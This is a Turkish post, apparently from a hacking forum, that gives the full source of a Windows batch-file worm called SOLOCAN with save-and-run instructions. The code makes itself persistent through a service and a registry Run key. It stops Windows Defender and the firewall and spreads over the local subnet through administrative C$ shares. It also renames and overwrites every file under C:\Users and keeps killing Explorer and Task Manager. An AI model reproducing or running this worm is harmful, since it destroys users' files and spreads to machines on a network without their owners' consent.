Aşağıdaki kodu Not defterine yapıştırın. Uzantısını .bat olarak kaydedin. Örnek: SOLOCAN.bat
Not: Kesinlikle kendi bilgisayarınızda denemeyin. Mesuliyet kabul etmem!
Özellikleri:
[*] Hizmet olarak çalışır.
[*] net kullanımı üzerinden ağdaki tüm bilgisayarları bulaşır.
[*] Ağdaki tüm kullanıcı hesaplarını bulaşır.
[*] C deki tüm dosyalara bulaşır.
[*] Kullanıcılar dosyasını gizler.
[*] Kayıt defterinde başlangıca kendini yazar.
[*] Görev Yöneticisini devre dışı bırakır.
[*] Masaüstünü kapatır.
[*] Windows Defender ve windows güvenlik duvarını kapatır.
Not: Kesinlikle kendi bilgisayarınızda denemeyin. Mesuliyet kabul etmem!
Özellikleri:
[*] Hizmet olarak çalışır.
[*] net kullanımı üzerinden ağdaki tüm bilgisayarları bulaşır.
[*] Ağdaki tüm kullanıcı hesaplarını bulaşır.
[*] C deki tüm dosyalara bulaşır.
[*] Kullanıcılar dosyasını gizler.
[*] Kayıt defterinde başlangıca kendini yazar.
[*] Görev Yöneticisini devre dışı bırakır.
[*] Masaüstünü kapatır.
[*] Windows Defender ve windows güvenlik duvarını kapatır.
Kod:
@echo off
rem <=-=-= Toplu Solucan =-=-=>
rem <=-=-= SOLOCAN =-=-=>
set i=0
set servicename=SOLOCAN
rem <=== Hizmet Olarak Calis ===>
echo sc create %servicename% binpath=%0 >> service.bat
echo sc start %servicename% >> service.bat
attrib +h +r +s service.bat
start service.bat
rem <=== Baslangic ===>
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
attrib +h +r +s %0
rem <=== Güvenlik duvari ve Windows Defender'i oldur ===>
net stop "Windows Defender Service"
net stop "Windows Firewall"
rem <=== Ag Bulas!!! ===>
:worm
net use Z: \\192.168.1.%i%\C$
if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
mountvol Z: /d)
if %i% == 256 (goto infect) else (set /a i=i+1)
goto worm
rem <=== infect *.* in C:\Users ===>
:infect
for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)
for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)
:payload
taskkill /f /im "explorer.exe"
taskkill /f /im "taskmgr.exe"
echo msgbox "SOLOCAN simdi Seni Yakaladi!",1,"%username% wants the D" > solocan.vbs
start solocan.vbs
goto payload
Not:Win7 için, zararlı dosya yönetici modunda çalıştırılmalı.
Son düzenleme: